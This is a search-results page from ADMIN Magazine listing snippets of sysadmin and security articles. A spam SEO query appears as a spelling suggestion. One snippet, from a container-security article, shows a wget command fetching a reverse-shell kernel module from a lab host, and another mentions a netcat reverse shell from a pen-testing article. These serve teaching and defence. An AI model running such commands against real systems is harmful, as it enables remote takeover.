Admin Magazine
 
  • News
  •  
  • Articles
  •  
  • Tech Tools
  •  
  • Subscribe
  •  
  • Archive
  •  
  • Whitepapers
  •  
  • Digisub
  •  
  • Write for Us!
  •  
  • Newsletter
  •  
  • Shop
  • DevOps
  • Cloud Computing
  • Virtualization
  • HPC
  • Linux
  • Windows
  • Security
  • Monitoring
  • Databases
  • all Topics...
Search
Login
ADMIN Magazine on Facebook
GooglePlus

Search

Spell check suggestion: 谷歌seo霸屏【电报e1000】google收录外推.how.0x05 ?

Refine your search
Sort order
  • Date
  • Score
Content type
  • Article (Print) (329)
  • Article (126)
  • Blog post (1)
Keywords
Creation time
  • Last day
  • Last week
  • Last month
  • Last three months
  • Last year

« Previous 1 ... 21 22 23 24 25 26 27 28 29 30 31 32 33 34 ... 46 Next »

71%
Creating a non-certified Windows To Go USB drive
14.03.2013
Home »  Archive  »  2013  »  Issue 13: IPv6...  » 
© Maksym Mzhavanadze, 123RF.com
?" The second is, "How do I create a W2G USB drive?" Once you have the USB drive in hand – or in pocket – many other questions arise about licensing, portability, and security. In this article, I'll answer all
71%
Securing the container environment
01.06.2024
Home »  Archive  »  2024  »  Issue 81: Load...  » 
Lead Image © zeferli, 123RF.com
.ko Listing 3 Download revershell File wget http://172.18.0.1:8000/revershell.ko Connecting to 172.18.0.1:8000 (172.18.0.1:8000) saving to 'revershell.ko' revershell.ko 100
71%
Exploring dhcpy6d, a DHCP server for IPv6 networks
03.12.2015
Home »  Archive  »  2015  »  Issue 30: OpenD...  » 
Lead Image © Paul Herbert, 123RF.com
2001:db8::201:203:409 prefixlen 64 scopeid 0x0 inet6 2001:db8::5555 prefixlen 64 scopeid 0x0 inet6 fe80::1:2ff:fe03:409 prefixlen 64 scopeid 0x20 ether 02
71%
Encrypt and decrypt files with Age or Rage
28.11.2022
Home »  Archive  »  2022  »  Issue 72: OpenS...  » 
with Age than with GnuPG. In this article, I look at how to use Age and how you can use it in practice. The Role of Encryption IT security protection goals define requirements for data or the contents
71%
Improved defense through pen testing
13.12.2018
Home »  Archive  »  2018  »  Issue 48: Secur...  » 
Lead Image Photo by Simeon Jacobson on Unsplash
a shell script or even by an unsuspecting user. Figure 10 then shows how attacker 10.0.2.20 opens a simple Bash shell and connects to the remote system with netcat
71%
A self-healing VM system
07.06.2019
Home »  Archive  »  2019  »  Issue 51: Self-...  » 
Lead Image © THISSATAN KOTIRAT , 123RF.com
.14.2.1; option subnet-mask 255.255.255.0; option domain-name-servers 10.14.2.210; option domain-search "giantco.cxm"; range 10.14.2.10 10.14.2.100; } Extreme care
71%
Vagrant, Serf, Packer, and Consul create and manage development environments
21.08.2014
Home »  Archive  »  2014  »  Issue 22: OpenS...  » 
Lead Image © 36clicks, 123RF.com
configuration file in your project directory. Within this file, called Vagrantfile (case not important), you need to describe the required software, configure the virtual machine, and determine how you would like
71%
Managing the Build Environment with Environment Modules
06.11.2012
Home »  HPC  »  Articles  » 
(MPICH2 and OpenMPI). The following illustrates how easy it is to manage the two environments with the use of two module commands, load and rm : $ module load mpich2/1.4.1p1/gnu4 $ which mpiexec /opt
71%
HPC Storage – I/O Profiling
26.01.2012
Home »  HPC  »  Articles  » 
cost-effective. Getting this process started usually means understanding how your applications perform I/O. This article presents some techniques for examining I/O patterns in HPC applications. ... for is how many processes in the MPI application actually do I/O, primarily write() . You will be very surprised that many applications have only a single MPI process, typically the rank-0 process, doing all ... cost-effective. Getting this process started usually means understanding how your applications perform I/O. This article presents some techniques for examining I/O patterns in HPC applications.
71%
A ptrace-based tracing mechanism for syscalls
06.10.2022
Home »  Archive  »  2022  »  Issue 71: Kuber...  » 
Photo by Nadjib BR on Unsplash
_addrmodule(dwfl, (uintptr_t)ip); 13 const char *module_name = dwfl_module_info(module, 0, 0, 0, 0, 0, 0, 0); 14 if (! strstr(module_name, stacktrace_module_name) ) { 15 continue; 16 } 17 18 found

« Previous 1 ... 21 22 23 24 25 26 27 28 29 30 31 32 33 34 ... 46 Next »

Service

  • Article Code
  • Contact
  • Legal Notice
  • Privacy Policy
  • Glossary
    • Backup Test
© 2025 Linux New Media USA, LLC – Legal Notice